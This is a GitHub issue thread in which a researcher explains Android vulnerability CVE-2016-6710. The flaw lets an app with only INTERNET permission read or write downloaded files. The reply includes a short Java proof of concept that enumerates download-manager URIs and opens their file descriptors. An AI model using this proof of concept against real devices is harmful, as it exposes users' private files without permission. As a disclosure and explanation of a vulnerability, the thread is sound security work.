### ISSUE TITLE
Hey, I have some questions about CVE-2016-6710.

### ISSUE THREAD

**Issue by diigu** [michalbednarski/IntentsLab#1]
Hey, I have some questions about CVE-2016-6710.
What kind of effects may result in or is there any PoC code?
Could you please help me figure this vulnerablity out?
Thank you very much.

@michalbednarski

**Comment by michalbednarski** [comment]
It allows application with just `INTERNET` permission to read/write downloaded files

Usually these files stay in `/sdcard/Downloads`, so app with `READ/WRITE_EXTERNAL_STORAGE` could access them (this counts as vulnerability as app without `STORAGE` permission can write into your downloads). It's possible that these files won't be on shared storage but on download manager internal directory from which they can be accessed only by app that initiated download (in case of app using system download manager instead of downloading files itself), but that's not very common (This as far as I know is used for keyboard dictionaries and maybe system updates (but update download must be started and system update is verified at multiple points, so that isn't issue))

PoC (For running in [AJShA](https://github.com/ligi/AJShA) ([Google Play](https://play.google.com/store/apps/details?id=org.ligi.ajsha))):
```java
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import libcore.io.Libcore;

ContentResolver res = ctx.getContentResolver();
for (int i = 1; i < 200; i++) {
  try {
    String uri = "content://downloads/my_downloads/" + i;
    ParcelFileDescriptor fd = res.openFileDescriptor(Uri.parse(uri), "r");
    print(i + ": " + Libcore.os.readlink("/proc/self/fd/" + fd.getFd()));
  } catch (FileNotFoundException e){}
}
```

`Libcore.os` is system internal way for running syscalls, on newer Android versions it is available as public API [android.system.Os](https://developer.android.com/reference/android/system/Os.html) (Though `readlink` is used for demonstration only, you can read (or write) from/to `fd` directly.)

IntentsLab doesn't currently provide `openFileDescriptor` support, however if you add `<uses-permission android:name="android.permission.INTERNET" />` to it's manifest and query `content://downloads/my_downloads` it'll show what downloads app is supposed to see using this API (which is none, if it haven't initiated any downloads itself)

**Comment by diigu** [comment]
Hi,
It's really a clever idea !

Really appreciate your patience!
